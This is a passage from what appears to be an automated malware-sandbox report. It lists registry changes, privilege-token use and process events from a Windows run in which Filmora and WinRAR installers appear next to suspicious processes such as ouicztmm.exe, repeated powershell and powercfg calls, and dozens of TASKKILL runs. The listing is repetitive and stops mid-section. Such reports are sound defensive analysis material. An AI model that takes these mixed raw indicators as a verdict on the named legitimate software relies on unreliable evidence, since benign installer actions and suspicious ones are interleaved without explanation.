TASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exepid process 4432 TASKKILL.exe 3924 TASKKILL.exe 4576 TASKKILL.exe 4432 TASKKILL.exe 5344 TASKKILL.exe 64 TASKKILL.exe 4748 TASKKILL.exe 4364 TASKKILL.exe 5848 TASKKILL.exe 4664 TASKKILL.exe 5568 TASKKILL.exe 4664 TASKKILL.exe 4420 TASKKILL.exe 5900 TASKKILL.exe 3740 TASKKILL.exe 6032 TASKKILL.exe 6112 TASKKILL.exe 2980 TASKKILL.exe 5048 TASKKILL.exe 4476 TASKKILL.exe 2296 TASKKILL.exe 5516 TASKKILL.exe 4648 TASKKILL.exe 4916 TASKKILL.exe 900 TASKKILL.exe 5516 TASKKILL.exe 2968 TASKKILL.exe 1808 TASKKILL.exe 1860 TASKKILL.exe 2236 TASKKILL.exe 5676 TASKKILL.exe 5664 TASKKILL.exe 5568 TASKKILL.exe 3056 TASKKILL.exe 5136 TASKKILL.exe 4224 TASKKILL.exe 5356 TASKKILL.exe 5328 TASKKILL.exe 2480 TASKKILL.exe -
Modifies Control Panel 1 IoCs
Processes:
filmora_setup_full846.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Control Panel\Desktop\MuiCached filmora_setup_full846.exe -
Processes:
filmora_setup_full846.exeWinRAR.exeMicrosoftEdge.exebrowser_broker.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" filmora_setup_full846.exe Key created \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch WinRAR.exe Set value (str) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" WinRAR.exe Key created \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch filmora_setup_full846.exe -
Modifies data under HKEY_USERS 3 IoCs
Processes:
msiexec.exedescription ioc process Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\1E\52C64B7E msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1f msiexec.exe -
Modifies registry class 64 IoCs
Processes:
uninstall.exeWSHelper.exeMicrosoftEdge.exefilmora_64bit_full846.tmpMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exemsiexec.exeWsToastNotification.exeMicrosoftEdgeCP.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.r28 uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{225BE4D8-64CA-49B1-9630-917F2D92F452}\TypeLib\Version = "1.1" WSHelper.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0FA988D3-BA51-48AD-A518-6462CD5FF547}\ProxyStubClsid32 WSHelper.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F0ABE7E0-32E3-472E-924C-162B1996DC23}\ = "IPayPerView" WSHelper.exe Key created \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WFPFile\Shell\Open filmora_64bit_full846.tmp Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WFPBundleFile\Shell\Open\Command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Wondershare\\Wondershare Filmora\\Wondershare Filmora Launcher.exe\" \"%1\"" filmora_64bit_full846.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4D3609D2-1D8A-4E9F-884B-438AFDDECB86}\ProxyStubClsid32 WSHelper.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.lz\ = "WinRAR" uninstall.exe Key created \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar\WebBrowser MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{36B0BA4B-20B5-4369-BBCA-9FAADC8EAC19}\TypeLib WSHelper.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{55DB3C89-37B9-41E8-87CC-7C578D2F5374} WSHelper.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0FA988D3-BA51-48AD-A518-6462CD5FF547}\TypeLib\ = "{D85C6069-D628-4276-93C3-9A94E5338D8B}" WSHelper.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{6E993643-8FBC-44FE-BC85-D318495C4D96}\TypeLib WSHelper.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.r24 uninstall.exe Key created \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdgeCP.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.r01\ = "WinRAR" uninstall.exe Key created \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1007C6B46D7C017319E3B52CF3EC196E\SourceList\LastUsedSource = "n;1;c:\\aa8616e4e254b41bdd1a96\\" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR uninstall.exe Key created \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\AppUserModelId\Wondershare.NotificationApp\DisplayName = "Wondershare" WsToastNotification.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.r01 uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.r10\ = "WinRAR" uninstall.exe Set value (data) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WFPSFile\Shell\Open\ = "&Open" filmora_64bit_full846.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0477E5C9-0877-499A-8A7C-154C777293DC}\ProxyStubClsid32 WSHelper.exe Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\EdpDomStorage\Total MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\CTLs MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C5CAFA8E-F69D-4E6F-9BF3-1F4522AFD4BE}\TypeLib WSHelper.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.r05\ = "WinRAR" uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.r11\ = "WinRAR" uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E1839CDE-A191-4DA4-9FCE-178A88318DF4}\TypeLib\Version = "1.1" WSHelper.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E1839CDE-A191-4DA4-9FCE-178A88318DF4}\ProxyStubClsid32 WSHelper.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WFPFile\ = "Wondershare Filmora 12 Project" filmora_64bit_full846.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shell\open\command uninstall.exe Set value (data) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 03bc80556daed801 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000ecf84c9afe63228ede2e4ca471aa00dc74a3bd987274a77f6bcd7759815e8d2e35d7281d25e97107403f34e7b1cc00a04c3e383552590cc341ec MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\EdpDomStorage\www.bing.com\ = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR uninstall.exe Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4D3609D2-1D8A-4E9F-884B-438AFDDECB86}\TypeLib\ = "{D85C6069-D628-4276-93C3-9A94E5338D8B}" WSHelper.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{225BE4D8-64CA-49B1-9630-917F2D92F452}\ProxyStubClsid32 WSHelper.exe Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\"" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.zip uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.rev\ = "WinRAR.REV" uninstall.exe Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0" MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.wfpbundles filmora_64bit_full846.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E90BA470-0728-47E6-B2E7-0ED0C0CFEA8F} WSHelper.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{5610D1A9-5B54-4E77-9190-94FF9E59AFBA}\TypeLib\ = "{D85C6069-D628-4276-93C3-9A94E5338D8B}" WSHelper.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.gz uninstall.exe Set value (int) \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\DOMStorage\bing.com MicrosoftEdgeCP.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WFPFile\Shell\Open\ = "&Open" filmora_64bit_full846.tmp -
NTFS ADS 1 IoCs
Processes:
browser_broker.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\Downloads\filmora_setup_full846.exe.r1gknyx.partial:Zone.Identifier browser_broker.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
Wondershare Filmora.exepid process 5432 Wondershare Filmora.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
chrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exeFile-Set-Up_PC.exeFile-Set-Up_PC.exeouicztmm.exeAppLaunch.exepowershell.exepid process 4300 chrome.exe 4300 chrome.exe 4248 chrome.exe 4248 chrome.exe 3956 chrome.exe 3956 chrome.exe 1192 chrome.exe 1192 chrome.exe 2500 chrome.exe 2500 chrome.exe 2736 chrome.exe 3060 chrome.exe 2736 chrome.exe 3060 chrome.exe 4744 chrome.exe 4744 chrome.exe 4440 chrome.exe 4440 chrome.exe 1296 chrome.exe 1296 chrome.exe 4636 chrome.exe 4636 chrome.exe 2200 chrome.exe 2200 chrome.exe 4552 chrome.exe 4552 chrome.exe 3304 chrome.exe 3304 chrome.exe 68 chrome.exe 68 chrome.exe 2352 chrome.exe 2352 chrome.exe 1476 chrome.exe 1476 chrome.exe 1636 chrome.exe 1636 chrome.exe 2820 chrome.exe 2820 chrome.exe 4684 chrome.exe 4684 chrome.exe 2200 chrome.exe 2200 chrome.exe 5016 chrome.exe 5016 chrome.exe 4348 chrome.exe 4348 chrome.exe 4348 chrome.exe 4348 chrome.exe 752 chrome.exe 752 chrome.exe 2528 chrome.exe 2528 chrome.exe 2536 File-Set-Up_PC.exe 2536 File-Set-Up_PC.exe 3844 File-Set-Up_PC.exe 3844 File-Set-Up_PC.exe 4728 ouicztmm.exe 4728 ouicztmm.exe 4728 ouicztmm.exe 4728 ouicztmm.exe 764 AppLaunch.exe 2732 powershell.exe 2732 powershell.exe 2732 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
Processes:
OpenWith.exeWinRAR.exetaskmgr.exepid process 3988 OpenWith.exe 3736 WinRAR.exe 5720 taskmgr.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 632 -
Suspicious behavior: MapViewOfSection 4 IoCs
Processes:
MicrosoftEdgeCP.exeMicrosoftEdgeCP.exepid process 400 MicrosoftEdgeCP.exe 400 MicrosoftEdgeCP.exe 400 MicrosoftEdgeCP.exe 5132 MicrosoftEdgeCP.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 25 IoCs
Processes:
chrome.exechrome.exechrome.exepid process 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 1168 chrome.exe 1168 chrome.exe 1168 chrome.exe 1168 chrome.exe 1168 chrome.exe 1168 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
AUDIODG.EXEAppLaunch.exepowershell.exeMicrosoftEdge.exedllhost.exeMicrosoftEdgeCP.exepowercfg.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowercfg.exeMicrosoftEdgeCP.exepowercfg.exepowercfg.exeMicrosoftEdgeCP.exefilmora_setup_full846.exetaskmgr.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exeTASKKILL.exedescription pid process Token: 33 3468 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 3468 AUDIODG.EXE Token: SeDebugPrivilege 764 AppLaunch.exe Token: SeDebugPrivilege 2732 powershell.exe Token: SeDebugPrivilege 3064 MicrosoftEdge.exe Token: SeDebugPrivilege 3064 MicrosoftEdge.exe Token: SeDebugPrivilege 3064 MicrosoftEdge.exe Token: SeDebugPrivilege 3064 MicrosoftEdge.exe Token: SeDebugPrivilege 3680 dllhost.exe Token: SeShutdownPrivilege 1988 MicrosoftEdgeCP.exe Token: SeCreatePagefilePrivilege 1988 MicrosoftEdgeCP.exe Token: SeShutdownPrivilege 2220 powercfg.exe Token: SeCreatePagefilePrivilege 2220 powercfg.exe Token: SeDebugPrivilege 708 powershell.exe Token: SeDebugPrivilege 4900 powershell.exe Token: SeDebugPrivilege 216 powershell.exe Token: SeDebugPrivilege 2532 powershell.exe Token: SeDebugPrivilege 2464 powershell.exe Token: SeShutdownPrivilege 4972 powercfg.exe Token: SeCreatePagefilePrivilege 4972 powercfg.exe Token: SeDebugPrivilege 2980 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 2980 MicrosoftEdgeCP.exe Token: SeShutdownPrivilege 2116 powercfg.exe Token: SeCreatePagefilePrivilege 2116 powercfg.exe Token: SeDebugPrivilege 1988 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 1988 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 1988 MicrosoftEdgeCP.exe Token: SeShutdownPrivilege 4644 powercfg.exe Token: SeCreatePagefilePrivilege 4644 powercfg.exe Token: SeShutdownPrivilege 4644 powercfg.exe Token: SeCreatePagefilePrivilege 4644 powercfg.exe Token: SeDebugPrivilege 5356 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 5356 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 5356 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 5356 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 3064 MicrosoftEdge.exe Token: SeDebugPrivilege 4684 filmora_setup_full846.exe Token: SeDebugPrivilege 4684 filmora_setup_full846.exe Token: SeDebugPrivilege 4684 filmora_setup_full846.exe Token: SeDebugPrivilege 4684 filmora_setup_full846.exe Token: SeDebugPrivilege 4684 filmora_setup_full846.exe Token: SeDebugPrivilege 4684 filmora_setup_full846.exe Token: SeDebugPrivilege 4684 filmora_setup_full846.exe Token: SeDebugPrivilege 5720 taskmgr.exe Token: SeSystemProfilePrivilege 5720 taskmgr.exe Token: SeCreateGlobalPrivilege 5720 taskmgr.exe Token: SeDebugPrivilege 5568 TASKKILL.exe Token: SeDebugPrivilege 5516 TASKKILL.exe Token: SeDebugPrivilege 1808 TASKKILL.exe Token: SeDebugPrivilege 5136 TASKKILL.exe Token: SeDebugPrivilege 3924 TASKKILL.exe Token: SeDebugPrivilege 4476 TASKKILL.exe Token: SeDebugPrivilege 4664 TASKKILL.exe Token: SeDebugPrivilege 4648 TASKKILL.exe Token: SeDebugPrivilege 4224 TASKKILL.exe Token: SeDebugPrivilege 4748 TASKKILL.exe Token: SeDebugPrivilege 4916 TASKKILL.exe Token: SeDebugPrivilege 5356 TASKKILL.exe Token: SeDebugPrivilege 5328 TASKKILL.exe Token: SeDebugPrivilege 4420 TASKKILL.exe Token: SeDebugPrivilege 900 TASKKILL.exe Token: SeDebugPrivilege 5664 TASKKILL.exe Token: SeDebugPrivilege 5900 TASKKILL.exe Token: SeDebugPrivilege 5568 TASKKILL.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
chrome.exechrome.exepid process 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
chrome.exechrome.exepid process 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 4248 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe 2200 chrome.exe -
Suspicious use of SetWindowsHookEx 64 IoCs
Processes:
OpenWith.exewinrar-x64-620.exeWinRAR.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exefilmora_setup_full846.exefilmora_64bit_full846.exefilmora_64bit_full846.tmp_setup64.tmpWondershare Helper Compact.exeWondershare Helper Compact.tmpWSHelper.exevcredist_x64.exeinstall.exeWondershare NativePush.exeWondershare NativePush.tmp_setup64.tmppid process 3988 OpenWith.exe 3988 OpenWith.exe 3988 OpenWith.exe 3988 OpenWith.exe 3988 OpenWith.exe 3988 OpenWith.exe 3988 OpenWith.exe 3988 OpenWith.exe 3988 OpenWith.exe 3988 OpenWith.exe 3988 OpenWith.exe 3988 OpenWith.exe 3988 OpenWith.exe 3988 OpenWith.exe 3988 OpenWith.exe 3988 OpenWith.exe 3988 OpenWith.exe 3988 OpenWith.exe 3988 OpenWith.exe 3988 OpenWith.exe 3988 OpenWith.exe 3988 OpenWith.exe 3988 OpenWith.exe 3988 OpenWith.exe 3988 OpenWith.exe 3988 OpenWith.exe 3988 OpenWith.exe 3988 OpenWith.exe 3988 OpenWith.exe 3988 OpenWith.exe 3988 OpenWith.exe 3988 OpenWith.exe 3988 OpenWith.exe 3988 OpenWith.exe 3988 OpenWith.exe 3988 OpenWith.exe 3988 OpenWith.exe 3988 OpenWith.exe 3044 winrar-x64-620.exe 3044 winrar-x64-620.exe 3736 WinRAR.exe 3736 WinRAR.exe 3064 MicrosoftEdge.exe 400 MicrosoftEdgeCP.exe 400 MicrosoftEdgeCP.exe 5356 MicrosoftEdgeCP.exe 5340 MicrosoftEdge.exe 5132 MicrosoftEdgeCP.exe 5132 MicrosoftEdgeCP.exe 4684 filmora_setup_full846.exe 4684 filmora_setup_full846.exe 4684 filmora_setup_full846.exe 4816 filmora_64bit_full846.exe 5912 filmora_64bit_full846.tmp 4544 _setup64.tmp 580 Wondershare Helper Compact.exe 3844 Wondershare Helper Compact.tmp 4560 WSHelper.exe 4560 WSHelper.exe 4156 vcredist_x64.exe 5528 install.exe 3620 Wondershare NativePush.exe 1928 Wondershare NativePush.tmp 4068 _setup64.tmp -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
